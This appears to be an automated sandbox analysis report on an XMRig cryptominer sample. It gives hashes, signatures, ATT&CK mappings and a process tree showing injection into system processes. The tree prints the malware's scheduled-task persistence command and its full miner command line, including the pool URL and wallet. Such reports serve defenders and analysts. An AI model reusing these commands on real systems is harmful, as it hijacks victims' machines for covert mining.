xmrig | 1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

General

Target

1234.exe
Size

2.1MB
MD5

8f7758d7ca504da8622fa77de521ac56
SHA1

33a94c3a952f75695f57a712074941642f6f948f
SHA256

1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3
SHA512

a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 12 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1732-83-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-84-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-85-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-86-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-87-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-88-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-89-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-90-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-91-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-92-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1732-93-0x000000014030F3F8-mapping.dmp	xmrig
behavioral1/memory/1732-95-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

Processes:

services64.exesihost64.exe

pid process

976 services64.exe
1700 sihost64.exe
Loads dropped DLL 4 IoCs

Processes:

cmd.execonhost.exe

pid process

804 cmd.exe
804 cmd.exe
1536 conhost.exe
1536 conhost.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 1536 set thread context of 1732 1536 conhost.exe svchost.exe
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1160 schtasks.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

conhost.execonhost.exe

pid process

784 conhost.exe
1536 conhost.exe
1536 conhost.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

conhost.execonhost.exe

description pid process

Token: SeDebugPrivilege 784 conhost.exe
Token: SeDebugPrivilege 1536 conhost.exe

pid	process
976	services64.exe
1700	sihost64.exe

pid	process
804	cmd.exe
804	cmd.exe
1536	conhost.exe
1536	conhost.exe

description	pid	process	target process
PID 1536 set thread context of 1732	1536	conhost.exe	svchost.exe

pid	process
1160	schtasks.exe

pid	process
784	conhost.exe
1536	conhost.exe
1536	conhost.exe

description	pid	process
Token: SeDebugPrivilege	784	conhost.exe
Token: SeDebugPrivilege	1536	conhost.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

1234.execonhost.execmd.execmd.exeservices64.execonhost.exesihost64.exe

description	pid	process	target process
PID 1592 wrote to memory of 784	1592	1234.exe	conhost.exe
PID 1592 wrote to memory of 784	1592	1234.exe	conhost.exe
PID 1592 wrote to memory of 784	1592	1234.exe	conhost.exe
PID 1592 wrote to memory of 784	1592	1234.exe	conhost.exe
PID 784 wrote to memory of 1932	784	conhost.exe	cmd.exe
PID 784 wrote to memory of 1932	784	conhost.exe	cmd.exe
PID 784 wrote to memory of 1932	784	conhost.exe	cmd.exe
PID 1932 wrote to memory of 1160	1932	cmd.exe	schtasks.exe
PID 1932 wrote to memory of 1160	1932	cmd.exe	schtasks.exe
PID 1932 wrote to memory of 1160	1932	cmd.exe	schtasks.exe
PID 784 wrote to memory of 804	784	conhost.exe	cmd.exe
PID 784 wrote to memory of 804	784	conhost.exe	cmd.exe
PID 784 wrote to memory of 804	784	conhost.exe	cmd.exe
PID 804 wrote to memory of 976	804	cmd.exe	services64.exe
PID 804 wrote to memory of 976	804	cmd.exe	services64.exe
PID 804 wrote to memory of 976	804	cmd.exe	services64.exe
PID 976 wrote to memory of 1536	976	services64.exe	conhost.exe
PID 976 wrote to memory of 1536	976	services64.exe	conhost.exe
PID 976 wrote to memory of 1536	976	services64.exe	conhost.exe
PID 976 wrote to memory of 1536	976	services64.exe	conhost.exe
PID 1536 wrote to memory of 1700	1536	conhost.exe	sihost64.exe
PID 1536 wrote to memory of 1700	1536	conhost.exe	sihost64.exe
PID 1536 wrote to memory of 1700	1536	conhost.exe	sihost64.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1536 wrote to memory of 1732	1536	conhost.exe	svchost.exe
PID 1700 wrote to memory of 1880	1700	sihost64.exe	conhost.exe
PID 1700 wrote to memory of 1880	1700	sihost64.exe	conhost.exe
PID 1700 wrote to memory of 1880	1700	sihost64.exe	conhost.exe
PID 1700 wrote to memory of 1880	1700	sihost64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\1234.exe
"C:\Users\Admin\AppData\Local\Temp\1234.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\1234.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
4⤵
- Creates scheduled task(s)
PID:1160

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services64.exe"
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:804

C:\Users\Admin\services64.exe
C:\Users\Admin\services64.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
7⤵
PID:1880

C:\Windows\System32\svchost.exe
C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=https://pool.hashvault.pro:80 --user=47mixi7RkAmR8pVCzjuTCzVLg6GDsYJGpCEZQ4fDgwfVMBZB4djECiyDZEX6vLmQ4p3KNLUUdiNtaECKeZ9Sb6EvGRJCt7s --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=100 --tls --cinit-stealth
6⤵
PID:1732

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
6f47627be7e8a255543a4f2be8003f83

SHA1
fc5fb148155738d8224103c15a8ef66569be1e10

SHA256
cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c

SHA512
22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

Download Submit
C:\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
C:\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
6f47627be7e8a255543a4f2be8003f83

SHA1
fc5fb148155738d8224103c15a8ef66569be1e10

SHA256
cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c

SHA512
22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
MD5
6f47627be7e8a255543a4f2be8003f83

SHA1
fc5fb148155738d8224103c15a8ef66569be1e10

SHA256
cc13f86d660cb263609033c46236071fc1eff3c8d78a788c169575185e078f9c

SHA512
22cb515e923bdf43d6fcd36dabce036ca981f34282e7b888f09a51ea124af10451559b19ee7515847653d7180a713307d6a69b48450aab796174c7437e036d62

Download Submit
\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
\Users\Admin\services64.exe
MD5
8f7758d7ca504da8622fa77de521ac56

SHA1
33a94c3a952f75695f57a712074941642f6f948f

SHA256
1b3d6b84916fcb6f6075afa29c93dd4f1566b76095d8727b331032bae857b4e3

SHA512
a1b1eb3e4a461cfb542e552081f03d31eb2ee9ace2accf67f91f52b775f62743c753bb61941d17d226fba217b4a25fec0015bdcaa8ddc5f0acac0d4e226191d0

Download Submit
memory/784-63-0x000000001B2B7000-0x000000001B2B8000-memory.dmp

Filesize
4KB

Download
memory/784-55-0x00000000001F0000-0x0000000000410000-memory.dmp

Filesize
2.1MB

Download
memory/784-59-0x000000001B2B2000-0x000000001B2B4000-memory.dmp

Filesize
8KB

Download
memory/784-61-0x000000001B2B6000-0x000000001B2B7000-memory.dmp

Filesize
4KB

Download
memory/784-60-0x000000001B2B4000-0x000000001B2B6000-memory.dmp

Filesize
8KB

Download
memory/784-56-0x000000001B550000-0x000000001B76C000-memory.dmp

Filesize
2.1MB

Download
memory/804-64-0x0000000000000000-mapping.dmp

Download
memory/976-68-0x0000000000000000-mapping.dmp

Download
memory/1160-62-0x0000000000000000-mapping.dmp

Download
memory/1536-73-0x000000001B174000-0x000000001B176000-memory.dmp

Filesize
8KB

Download
memory/1536-75-0x000000001B177000-0x000000001B178000-memory.dmp

Filesize
4KB

Download
memory/1536-74-0x000000001B176000-0x000000001B177000-memory.dmp

Filesize
4KB

Download
memory/1536-72-0x000000001B172000-0x000000001B174000-memory.dmp

Filesize
8KB

Download
memory/1700-78-0x0000000000000000-mapping.dmp

Download
memory/1732-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-90-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-81-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-82-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-83-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-84-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-85-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-86-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-87-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-88-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-89-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-95-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-91-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-92-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1732-93-0x000000014030F3F8-mapping.dmp

Download
memory/1732-94-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1880-96-0x0000000001C80000-0x0000000001C82000-memory.dmp

Filesize
8KB

Download
memory/1880-99-0x0000000001F82000-0x0000000001F84000-memory.dmp

Filesize
8KB

Download
memory/1880-98-0x0000000000060000-0x0000000000066000-memory.dmp

Filesize
24KB

Download
memory/1880-101-0x0000000001F86000-0x0000000001F87000-memory.dmp

Filesize
4KB

Download
memory/1880-100-0x0000000001F84000-0x0000000001F86000-memory.dmp

Filesize
8KB

Download
memory/1880-102-0x0000000001F87000-0x0000000001F88000-memory.dmp

Filesize
4KB

Download
memory/1932-58-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads